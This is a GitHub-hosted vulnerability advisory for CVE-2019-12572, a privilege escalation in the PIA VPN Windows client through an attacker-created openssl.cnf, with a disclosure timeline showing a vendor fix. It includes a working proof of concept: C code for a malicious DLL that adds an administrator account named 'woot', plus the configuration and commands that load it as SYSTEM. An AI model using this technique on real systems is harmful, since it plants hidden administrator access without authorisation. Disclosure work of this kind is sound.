Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12572.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
116 lines (78 sloc)
2.88 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12572 | |
| Vendor Advisory: N/A | |
| Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/ | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client 1.0.2 (build 02363) for Windows could allow an authenticated, local | |
| attacker to run arbitrary code with elevated privileges. | |
| On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from | |
| C:\Program Files\Private Internet Access\libeay32.dll. This library attempts | |
| to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By | |
| default on Windows systems, authenticated users can create directories under c:\. | |
| A low privileged user can create an openssl.cnf configuration file to load a | |
| malicious OpenSSL engine library resulting in the arbitrary code execution as | |
| SYSTEM when the service starts. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C | |
| Base: 7.8 | |
| Temporal: 7.8 | |
| Test Environment | |
| OS: Windows 10 Pro 10.0.17763 | |
| PIA Version: 1.0.2 (build 02363) | |
| Steps to reproduce | |
| Note: All steps are executed using a low privileged account. | |
| 1) Create the c:\etc\ssl directory | |
| mkdir c:\etc\ssl | |
| 2) Create a malicious engine library named woot.dll to create an administrator | |
| account named woot when loaded. | |
| /* Cross Compile with | |
| x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared | |
| */ | |
| #include <windows.h> | |
| BOOL WINAPI DllMain( | |
| HINSTANCE hinstDLL, | |
| DWORD fdwReason, | |
| LPVOID lpReserved ) | |
| { | |
| switch( fdwReason ) | |
| { | |
| case DLL_PROCESS_ATTACH: | |
| system("cmd /c net user woot insertpasswordhere /add"); | |
| system("cmd /c net localgroup administrators woot /add"); | |
| break; | |
| case DLL_THREAD_ATTACH: | |
| // Do thread-specific initialization. | |
| break; | |
| case DLL_THREAD_DETACH: | |
| // Do thread-specific cleanup. | |
| break; | |
| case DLL_PROCESS_DETACH: | |
| // Perform any necessary cleanup. | |
| break; | |
| } | |
| return TRUE; // Successful DLL_PROCESS_ATTACH. | |
| } | |
| 3) Copy the malicious woot.dll file into the c:\etc\ssl folder. | |
| copy woot.dll c:\etc\ssl | |
| 4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents. | |
| openssl_conf = openssl_init | |
| [openssl_init] | |
| engines = engine_section | |
| [engine_section] | |
| woot = woot_section | |
| [woot_section] | |
| engine_id = woot | |
| dynamic_path = c:\\etc\\ssl\\woot.dll | |
| init = 0 | |
| 5) Reboot the system because a low privilege user does not have permission to | |
| restart the service. | |
| 6) After the reboot has completed, login and open a command shell. At this point | |
| the "woot" administrator account will exist. | |
| net user woot | |
| Timeline: | |
| 2019-02-16: Reported to vendor | |
| 2019-02-16: Vendor confirmed vulnerability | |
| 2019-06-04: Vendor released fix in v1.2.1 | |
| 2019-06-10: Public disclosure |